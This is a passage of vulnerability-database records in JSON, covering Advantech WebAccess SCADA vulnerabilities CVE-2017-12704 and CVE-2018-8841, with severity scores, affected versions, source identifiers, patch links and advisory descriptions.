"NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12704", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-12704", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2017-23883", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201708-1280", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-103253", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2017-12704", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9" }, { "db": "CNVD", "id": "CNVD-2017-23883" }, { "db": "VULHUB", "id": "VHN-103253" }, { "db": "VULMON", "id": "CVE-2017-12704" }, { "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "db": "CNNVD", "id": "CNNVD-201708-1280" }, { "db": "NVD", "id": "CVE-2017-12704" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A heap-based buffer overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities where there is a lack of proper validation of the length of user-supplied data prior to copying it to the heap-based buffer, which could allow an attacker to execute arbitrary code under the context of the process. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple stack-based buffer-overflow vulnerabilities\n2. Multiple heap-based buffer-overflow vulnerabilities. \n3. Multiple memory-corruption vulnerabilities. \n4. An SQL-injection vulnerability. \n5. A format-string vulnerability. \n6. An authentication-bypass vulnerability. \n7. A security-bypass vulnerability. \n8. A privilege-escalation vulnerability. \n9. A remote-code execution vulnerability. This may aid in further attacks. \nAdvantech WebAccess versions prior to V8.2_20170817 are vulnerable. The vulnerability stems from the fact that the program does not fully verify the length of the data submitted by the user", "sources": [ { "db": "NVD", "id": "CVE-2017-12704" }, { "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "db": "CNVD", "id": "CNVD-2017-23883" }, { "db": "BID", "id": "100526" }, { "db": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9" }, { "db": "VULHUB", "id": "VHN-103253" }, { "db": "VULMON", "id": "CVE-2017-12704" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-12704", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-17-241-02", "trust": 3.5 }, { "db": "BID", "id": "100526", "trust": 2.1 }, { "db": "CNNVD", "id": "CNNVD-201708-1280", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-23883", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-007399", "trust": 0.8 }, { "db": "IVD", "id": "96D43DE0-3F58-40E3-841A-E1B2D8A8FCD9", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103253", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2017-12704", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9" }, { "db": "CNVD", "id": "CNVD-2017-23883" }, { "db": "VULHUB", "id": "VHN-103253" }, { "db": "VULMON", "id": "CVE-2017-12704" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "db": "CNNVD", "id": "CNNVD-201708-1280" }, { "db": "NVD", "id": "CVE-2017-12704" } ] }, "id": "VAR-201708-1119", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9" }, { "db": "CNVD", "id": "CNVD-2017-23883" }, { "db": "VULHUB", "id": "VHN-103253" } ], "trust": 1.582962455 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9" }, { "db": "CNVD", "id": "CNVD-2017-23883" } ] }, "last_update_date": "2024-11-23T21:53:49.809000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess HEAP Buffer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/101167" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=74369" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23883" }, { "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "db": "CNNVD", "id": "CNNVD-201708-1280" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 }, { "problemtype": "CWE-122", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-103253" }, { "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "db": "NVD", "id": "CVE-2017-12704" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.5, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-241-02" }, { "trust": 1.9, "url": "http://www.securityfocus.com/bid/100526" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12704" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12704" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23883" }, { "db": "VULHUB", "id": "VHN-103253" }, { "db": "VULMON", "id": "CVE-2017-12704" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "db": "CNNVD", "id": "CNNVD-201708-1280" }, { "db": "NVD", "id": "CVE-2017-12704" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9" }, { "db": "CNVD", "id": "CNVD-2017-23883" }, { "db": "VULHUB", "id": "VHN-103253" }, { "db": "VULMON", "id": "CVE-2017-12704" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "db": "CNNVD", "id": "CNNVD-201708-1280" }, { "db": "NVD", "id": "CVE-2017-12704" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9" }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23883" }, { "date": "2017-08-30T00:00:00", "db": "VULHUB", "id": "VHN-103253" }, { "date": "2017-08-30T00:00:00", "db": "VULMON", "id": "CVE-2017-12704" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-20T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1280" }, { "date": "2017-08-30T18:29:00.407000", "db": "NVD", "id": "CVE-2017-12704" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23883" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-103253" }, { "date": "2019-10-09T00:00:00", "db": "VULMON", "id": "CVE-2017-12704" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-20T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1280" }, { "date": "2024-11-21T03:10:03.727000", "db": "NVD", "id": "CVE-2017-12704" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1280" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "db": "CNNVD", "id": "CNNVD-201708-1280" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9" }, { "db": "CNNVD", "id": "CNNVD-201708-1280" } ], "trust": 0.8 } }
var-201805-1126
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an improper privilege management vulnerability may allow an authenticated user to modify files when read access should only be given to the user. plural Advantech WebAccess The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privilege on vulnerable installations of Advantech WebAccess Node. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens access control restrictions of pre-existing system files and sets weak access control restrictions on new files. An attacker can leverage this vulnerability to execute arbitrary code under the context of Administrator, the IUSR account, or SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A security vulnerability exists in several Advantech products that stems from a program's failure to properly manage permissions. An attacker could use this vulnerability to modify a file. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess etc
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess scada node", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess node", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess \u003c=v8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "_id": null, "model": "webaccess scada node", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2f6b281-39ab-11e9-b166-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-500" }, { "db": "CNVD", "id": "CNVD-2018-13782" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005076" }, { "db": "CNNVD", "id": "CNNVD-201805-442" }, { "db": "NVD", "id": "CVE-2018-8841" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_dashboard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_scada", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess%2fnms", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005076" } ] }, "credits": { "_id": null, "data": "Fritz Sands of the Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-18-500" } ], "trust": 0.7 }, "cve": "CVE-2018-8841", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "CVE-2018-8841", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CVE-2018-8841", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "CNVD-2018-13782", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "e2f6b281-39ab-11e9-b166-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "VHN-138873", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2018-8841", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-8841", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-8841", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2018-8841", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-13782", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201805-442", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2f6b281-39ab-11e9-b166-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-138873", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e2f6b281-39ab-11e9-b166-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-500" }, { "db": "CNVD", "id": "CNVD-2018-13782" }, { "db": "VULHUB", "id": "VHN-138873" }, { "db": "JVNDB", "id": "JVNDB-2018-005076" }, { "db": "CNNVD", "id": "CNNVD-201805-442" }, { "db": "NVD", "id": "CVE-2018-8841" } ] }, "description": { "_id": null, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an improper privilege management vulnerability may allow an authenticated user to modify files when read access should only be given to the user. plural Advantech WebAccess The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privilege on vulnerable installations of Advantech WebAccess Node. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens access control restrictions of pre-existing system files and sets weak access control restrictions on new files. An attacker can leverage this vulnerability to execute arbitrary code under the context of Administrator, the IUSR account, or SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A security vulnerability exists in several Advantech products that stems from a program\u0027s failure to properly manage permissions. An attacker could use this vulnerability to modify a file. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. A privilege-escalation vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess etc", "sources": [ { "db": "NVD", "id": "CVE-2018-8841" }, { "db": "JVNDB", "id": "JVNDB-2018-005076" }, { "db": "ZDI", "id": "ZDI-18-500" }, { "db": "CNVD", "id": "CNVD-2018-13782" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2f6b281-39ab-11e9-b166-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-138873" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-8841", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 3.4 }, { "db": "BID", "id": "104190", "trust": 2.6 }, { "db": "CNVD", "id": "CNVD-2018-13782", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201805-442", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-005076", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5670", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-500", "trust": 0.7 }, { "db": "IVD", "id": "E2F6B281-39AB-11E9-B166-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-138873", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2f6b281-39ab-11e9-b166-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-500" }, { "db": "CNVD", "id": "CNVD-2018-13782" }, { "db": "VULHUB", "id": "VHN-138873" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005076" }, { "db": "CNNVD", "id": "CNNVD-201805-442" }, { "db": "NVD", "id": "CVE-2018-8841" } ] }, "id": "VAR-201805-1126", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f6b281-39ab-11e9-b166-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-13782" }, { "db": "VULHUB", "id": "VHN-138873" } ], "trust": 1.5434040525000001 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f6b281-39ab-11e9-b166-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-13782" } ] }, "last_update_date": "2024-11-23T21:53:07.965000Z", "patch": { "_id": null, "data": [ { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" }, { "title": "Patches for Multiple Advantech Products Improper Rights Management Vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/135203" }, { "title": "Multiple Advantech Product security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80052" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-500" }, { "db": "CNVD", "id": "CNVD-2018-13782" }, { "db": "JVNDB", "id": "JVNDB-2018-005076" }, { "db": "CNNVD", "id": "CNNVD-201805-442" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-269", "trust": 1.1 }, { "problemtype": "CWE-264", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-138873" }, { "db": "JVNDB", "id": "JVNDB-2018-005076" }, { "db": "NVD", "id": "CVE-2018-8841" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8841" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8841" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-500" }, { "db": "CNVD", "id": "CNVD-2018-13782" }, { "db": "VULHUB", "id": "VHN-138873" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005076" }, { "db": "CNNVD", "id": "CNNVD-201805-442" }, { "db": "NVD", "id": "CVE-2018-8841" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f6b281-39ab-11e9-b166-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-500", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-13782", "ident": null }, { "db": "VULHUB", "id": "VHN-138873", "ident": null }, { "db": "BID", "id": "104190", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2018-005076", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201805-442", "ident": null }, { "db": "NVD", "id": "CVE-2018-8841", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-07-24T00:00:00", "db": "IVD", "id": "e2f6b281-39ab-11e9-b166-000c29342cb1", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-500", "ident": null }, { "date": "2018-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2018-13782", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "VULHUB", "id": "VHN-138873", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005076", "ident": null }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-442", "ident": null }, { "date": "2018-05-15T22:29:00.690000", "db": "NVD", "id": "CVE-2018-8841", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-500", "ident": null }, { "date": "2018-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2018-13782", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-138873", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005076", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-442", "ident": null }, { 